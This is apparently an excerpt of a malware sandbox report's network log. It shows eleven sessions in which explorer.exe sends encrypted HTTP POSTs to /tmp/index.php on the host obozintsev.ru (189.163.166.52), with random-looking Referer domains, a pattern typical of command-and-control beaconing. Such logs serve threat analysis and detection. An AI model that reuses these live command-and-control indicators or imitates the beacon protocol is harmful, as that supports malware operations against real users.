74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49865	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:39.192209005 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ngsmolqmjlkr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 177 Host: obozintsev.ru
Nov 30, 2024 11:13:39.192223072 CET	177	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 5b 01 c6 ff Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[(k,vu[ZG6~^cwwA6wvW?&P<?Tdev:jI=Kd
Nov 30, 2024 11:13:41.033102989 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49869	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:41.157958984 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xwimesajyti.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: obozintsev.ru
Nov 30, 2024 11:13:41.157991886 CET	363	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 29 6b 2c 90 f5 76 0b 75 58 0e ff 9b Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[)k,vuXxESuGn7v&6#W6;x\dN)7_!:4K?rB)lZZ.eD^0ON!Uwd@*ml5&]
Nov 30, 2024 11:13:42.994563103 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49881	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:45.809374094 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qasfskgmelreo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: obozintsev.ru
Nov 30, 2024 11:13:45.809393883 CET	318	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 29 6b 2c 90 f4 76 0b 75 7e 41 a7 e7 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA ,[)k,vu~A)jhs+/<5odej$yQ)]3)~P>=/8,\|SmY(3Fw{8dqcAX&-kR4L
Nov 30, 2024 11:13:47.602294922 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49887	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:47.730003119 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xgfnddjygdt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 191 Host: obozintsev.ru
Nov 30, 2024 11:13:47.730045080 CET	191	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2e 6b 2c 90 f5 76 0b 75 47 1c cb e1 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[.k,vuGu$@b<@`qtbHvF=q;3A8 S+N[EGV8wMrl
Nov 30, 2024 11:13:49.522645950 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:49 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49890	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:49.662631989 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ciuapvhjnqxsxxwr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 177 Host: obozintsev.ru
Nov 30, 2024 11:13:49.662646055 CET	177	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2f 6b 2c 90 f5 76 0b 75 5f 56 dc ec Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[/k,vu_Va;Nl3k4V$~VH+_4CBH^x8DOIG>?`9dMQ
Nov 30, 2024 11:13:51.422012091 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:51 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49896	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:51.558331013 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://egomlfgoxoteaymh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 305 Host: obozintsev.ru
Nov 30, 2024 11:13:51.558353901 CET	305	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2c 6b 2c 90 f5 76 0b 75 49 30 c5 f7 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[,k,vuI0MWC}VaXB?l>b0u]h,_ImAXQ RCqI'"OgK:dSU=HD`x3PZ_.1~
Nov 30, 2024 11:13:53.395775080 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49902	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:53.544500113 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ewsvhrknjfqh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: obozintsev.ru
Nov 30, 2024 11:13:53.544539928 CET	164	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2d 6b 2c 90 f5 76 0b 75 40 25 b8 ee Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[-k,vu@%~1\|~?^GDDU9#1c].Q[H B0E
Nov 30, 2024 11:13:55.339034081 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49908	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:55.469620943 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uqjegtiiabqrm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: obozintsev.ru
Nov 30, 2024 11:13:55.469635963 CET	228	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 22 6b 2c 90 f5 76 0b 75 54 42 de 93 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -["k,vuTBcvEJs)L[x2MJ0_E#RW1_HBa}V;!}m2i1iV?6gZU=9;uXc7k
Nov 30, 2024 11:13:57.270198107 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49912	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:57.566004038 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mdwlauviipmapdo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: obozintsev.ru
Nov 30, 2024 11:13:57.566135883 CET	203	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 23 6b 2c 90 f5 76 0b 75 64 3e be bf Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[#k,vud>:Pc\$7Q&ns&YZt`x1U=t0T/?C!=RE[!2eT6
Nov 30, 2024 11:13:59.350991964 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49915	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:59.501769066 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pjedtjbwdoay.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: obozintsev.ru
Nov 30, 2024 11:13:59.501805067 CET	169	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 20 6b 2c 90 f5 76 0b 75 32 2e d0 a2 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[ k,vu2.a?\|R}e+o::>wEY6@ag>J#4\'V]C}%D~70
Nov 30, 2024 11:14:01.340970039 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49921	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:01.467909098 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://buqwtxgqsqkupxr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: obozintsev.ru
Nov 30, 2024 11:14:01.467921019 CET	358	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 21 6b 2c 90 f5 76 0b 75 3b 45 b3 86 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[!k,vu;E!Y\|P2.#9i:YCod~VJ=h(UC'#WxTxA{6[M8M0tD++ANv+5#6e
